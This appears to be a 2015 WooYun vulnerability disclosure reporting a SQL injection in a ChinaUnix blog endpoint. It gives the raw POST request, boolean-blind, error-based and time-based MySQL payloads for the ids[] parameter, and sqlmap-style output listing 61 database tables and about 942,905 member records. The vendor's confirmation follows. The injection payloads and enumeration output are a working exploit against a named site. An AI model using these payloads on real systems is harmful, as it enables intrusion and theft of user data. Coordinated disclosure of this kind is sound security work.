当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116514

漏洞标题:ChinaUnix某站点MySQL注入近百万用户信息

相关厂商:ChinaUnix

漏洞作者: 路人甲

提交时间:2015-05-27 16:32

修复时间:2015-07-16 09:24

公开时间:2015-07-16 09:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经确认,细节仅向厂商公开
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

233

详细说明:

POST /blog/LogicDelBatch.html HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: blog.chinaunix.net
Cookie: **********************
Host: blog.chinaunix.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
allsel=on&ids%5b%5d=sqlfind

漏洞证明:

---
Parameter: ids[] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: allsel=on&ids[]=a) AND 9396=9396 AND (5600=5600
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: allsel=on&ids[]=a) AND (SELECT 9889 FROM(SELECT COUNT(*),CONCAT(0x7
176767a71,(SELECT (ELT(9889=9889,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFOR
MATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1816=1816
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: allsel=on&ids[]=a) AND (SELECT * FROM (SELECT(SLEEP(5)))MReN) AND (
7930=7930
---
[16:25:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: cublog
[61 tables]
+---------------------------+
| tbl_album |
| tbl_attachments |
| tbl_blog |
| tbl_blog_draft |
| tbl_blog_field_1 |
| tbl_blog_field_10 |
| tbl_blog_field_11 |
| tbl_blog_field_12 |
| tbl_blog_field_13 |
| tbl_blog_field_14 |
| tbl_blog_field_16 |
| tbl_blog_field_17 |
| tbl_blog_field_18 |
| tbl_blog_field_2 |
| tbl_blog_field_20 |
| tbl_blog_field_21 |
| tbl_blog_field_22 |
| tbl_blog_field_24 |
| tbl_blog_field_25 |
| tbl_blog_field_26 |
| tbl_blog_field_27 |
| tbl_blog_field_28 |
| tbl_blog_field_29 |
| tbl_blog_field_3 |
| tbl_blog_field_30 |
| tbl_blog_field_4 |
| tbl_blog_field_5 |
| tbl_blog_field_6 |
| tbl_blog_field_8 |
| tbl_blog_field_9 |
| tbl_class |
| tbl_collection_links |
| tbl_common_config |
| tbl_index_del |
| tbl_issue |
| tbl_link |
| tbl_member |
| tbl_member_failedlogin |
| tbl_member_field |
| tbl_member_friend |
| tbl_member_group |
| tbl_member_notification |
| tbl_member_reply |
| tbl_member_set |
| tbl_member_visitor |
| tbl_moving_error_url |
| tbl_outside_articles |
| tbl_pic |
| tbl_pm_private_memberlist |
| tbl_pm_private_message |
| tbl_pm_system_message |
| tbl_pm_system_status |
| tbl_sitemap |
| tbl_sitemap_log |
| tbl_special |
| tbl_special_articles |
| tbl_spider_moving |
| tbl_user_sinaid |
| tbl_zhuanti_excels |
| tbl_zhuanti_keywords |
| uchome_space |
+---------------------------+
Database: cublog
+------------+---------+
| Table | Entries |
+------------+---------+
| tbl_member | 942905 |
+------------+---------+

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-01 09:23

厂商回复:

多谢帮助。

最新状态:

暂无